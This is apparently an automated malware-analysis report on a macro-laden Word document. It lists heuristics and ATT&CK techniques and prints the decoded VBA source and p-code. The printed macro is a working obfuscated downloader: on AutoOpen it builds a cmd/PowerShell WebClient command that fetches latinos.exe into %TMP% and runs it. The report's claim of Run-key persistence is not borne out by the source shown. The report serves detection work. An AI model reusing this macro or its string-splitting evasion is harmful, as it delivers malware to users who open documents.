MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that uses CreateObject to execute a command. This command downloads a file named 'latinos.exe' to the temporary directory and then executes it. The macro also attempts to establish persistence by writing to the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'. The embedded URLs appear to be benign schema references.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
EIjfiHEUUU = OIEJiEIHFUOO Set pOIJiJIHuuEUUf = CreateObject( _ "" + kiiiHEHu + "p" + isdhsut.ibhuhug + "h" + KfjjIIhei + "") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() ghUEuGUufGUe = ELfOEJ + peOIEJijf -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5515 bytes |
SHA-256: 65b8622fa131accfdfddb51fe16b84545be519e359868f93695ea3720b42cbf1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iJHuhuuEE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
ghUEuGUufGUe = ELfOEJ + peOIEJijf
kiiiHEHu = isdhsut.viishdh
OEjjiEIiieI = pEofOEjfiEOO + IEhufUEh + eoJFieue
KfjjIIhei = "ell"
EIjfiHEUUU = OIEJiEIHFUOO
Set pOIJiJIHuuEUUf = CreateObject( _
"" + kiiiHEHu + "p" + isdhsut.ibhuhug + "h" + KfjjIIhei + "")
pOIJiJIHuuEUUf.Run ovsJIjgijIR(), 0
End Sub
Function ovsJIjgijIR()
kOJjiiI = "(nE"
oidiHIhguv = kOJjiiI + idhuru.obsjie + "ECT ('" + idhuru.isjgkr + "'+'N'+'et.WebCli'+'en'+'t'))"
oijdiHhhf = "mch.co"
gsjdidj = "'" + mvdoir.odjiwr + "sa" + oijdiHhhf + "m" + mvdoir.idurh + "cr '"
kpJKejf = ".('Do"
pKookvoOjvo = kpJKejf + "wn'+'load'+'" + isdhsut.Caption + "').Invoke(" + gsjdidj + ","
pKOjibhuidj = "'%TMP%\latinos.exe')"
UggfgEY = "PRoC"
OfkOjIejiHE = isdhsut.jixjiihd + "Rt-" + UggfgEY + "e`sS '%TMP%\latinos.exe';"
oJofjiJE = idhuru.isdihs + "S" + idhuru.Caption + ""
JIhHUUfggF = oJofjiJE & oidiHIhguv
JHghuhuGGU = pKookvoOjvo + pKOjibhuidj + OfkOjIejiHE
uhuGEyfgyGE = JIhHUUfggF & JHghuhuGGU
udgge = "c"
jIheuGtyye = udgge + isdhsut.ibhdur
ovsJIjgijIR = jIheuGtyye + " /c " + uhuGEyfgyGE + " "
End Function
Attribute VB_Name = "JFihUEHfw"
Attribute VB_Name = "mvdoir"
Attribute VB_Base = "0{E3F8DB7F-3197-4DD9-A84D-7D2B1A70428F}{5DED60BB-E0D1-4D17-B074-1D4E08647AD1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "isdhsut"
Attribute VB_Base = "0{0130C5FF-2D1C-4B94-8B47-3B40D6E8636B}{4D60EEB9-C498-46B7-8388-43B7D3A166CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "idhuru"
Attribute VB_Base = "0{1443E596-BF91-4AD3-8D8A-CF4B90316189}{1E5F2541-2F16-42BF-AE4B-092C8DEF2D9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Processing file: /opt/analyzer/scan_staging/82e92a3a01594ded88e53707f97826fa.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iJHuhuuEE - 3280 bytes
' Line #0:
' FuncDefn (Sub kiiiHEHu())
' Line #1:
' Ld viishdh
' Ld OEjjiEIiieI
' Add
' St isdhsut
' Line #2:
' Ld IEhufUEh
' MemLd eoJFieue
' St pEofOEjfiEOO
' Line #3:
' Ld EIjfiHEUUU
' Ld OIEJiEIHFUOO
' Add
' Ld pOIJiJIHuuEUUf
' Add
' St KfjjIIhei
' Line #4:
' LitStr 0x0003 "ell"
' St CreateObject
' Line #5:
' Ld Run
' St ibhuhug
' Line #6:
' LineCont 0x0004 05 00 00 00
' SetStmt
' LitStr 0x0000 ""
' Ld pEofOEjfiEOO
' Add
' LitStr 0x0001 "p"
' Add
' Ld IEhufUEh
' MemLd oidiHIhguv
' Add
' LitStr 0x0001 "h"
' Add
' Ld CreateObject
' Add
' LitStr 0x0000 ""
' Add
' ArgsLd kOJjiiI 0x0001
' Set ovsJIjgijIR
' Line #7:
' ArgsLd obsjie 0x0000
' LitDI2 0x0000
' Ld ovsJIjgijIR
' ArgsMemCall idhuru 0x0002
' Line #8:
' EndSub
' Line #9:
' FuncDefn (Function obsjie(id_FFFE As Variant))
' Line #10:
' LitStr 0x0003 "(nE"
' St isjgkr
' Line #11:
' Ld isjgkr
' Ld kpJKejf
' MemLd pKookvoOjvo
' Add
' LitStr 0x0006 "ECT ('"
' Add
' Ld kpJKejf
' MemLd Caption
' Add
' LitStr 0x001C "'+'N'+'et.WebCli'+'en'+'t'))"
' Add
' St gsjdidj
' Line #12:
' LitStr 0x0006 "mch.co"
' St TextBox3
' Line #13:
' LitStr 0x0001 "'"
' Ld _B_var_ghUEuGUufGUe
' MemLd id_02BE
' Add
' LitStr 0x0002 "sa"
' Add
' Ld TextBox3
' Add
' LitStr 0x0001 "m"
' Add
' Ld _B_var_ghUEuGUufGUe
' MemLd id_02C0
' Add
' LitStr 0x0004 "cr '"
' Add
' St pKOjibhuidj
' Line #14:
' LitStr 0x0005 ".('Do"
' St UggfgEY
' Line #15:
' Ld UggfgEY
' LitStr 0x000C "wn'+'load'+'"
' Add
' Ld IEhufUEh
' MemLd jixjiihd
' Add
' LitStr 0x000A "').Invoke("
' Add
' Ld pKOjibhuidj
' Add
' LitStr 0x0001 ","
' Add
' St OfkOjIejiHE
' Line #16:
' LitStr 0x0014 "'%TMP%\latinos.exe')"
' St oJofjiJE
' Line #17:
' LitStr 0x0004 "PRoC"
' St isdihs
' Line #18:
' Ld IEhufUEh
' MemLd JHghuhuGGU
' LitStr 0x0003 "Rt-"
' Add
' Ld isdihs
' Add
' LitStr 0x0019 "e`sS '%TMP%\latinos.exe';"
' Add
' St JIhHUUfggF
' Line #19:
' Ld kpJKejf
' MemLd udgge
' LitStr 0x0001 "S"
' Add
' Ld kpJKejf
' MemLd jixjiihd
' Add
' LitStr 0x0000 ""
' Add
' St uhuGEyfgyGE
' Line #20:
' Ld uhuGEyfgyGE
' Ld gsjdidj
' Concat
' St jIheuGtyye
' Line #21:
' Ld OfkOjIejiHE
' Ld oJofjiJE
' Add
' Ld JIhHUUfggF
' Add
' St ibhdur
' Line #22:
' Ld jIheuGtyye
' Ld ibhdur
' Concat
' St JFihUEHfw
' Line #23:
' LitStr 0x0001 "c"
' St mvdoir
' Line #24:
' Ld mvdoir
' Ld IEhufUEh
' MemLd _B_var_ELfOEJ
' Add
' St Document
' Line #25:
' Ld Document
' LitStr 0x0004 " /c "
' Add
' Ld JFihUEHfw
' Add
' LitStr 0x0001 " "
' Add
' St obsjie
' Line #26:
' EndFunc
' Macros/VBA/JFihUEHfw - 686 bytes
' Macros/VBA/mvdoir - 1316 bytes
' Macros/VBA/isdhsut - 1317 bytes
' Macros/VBA/idhuru - 1317 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.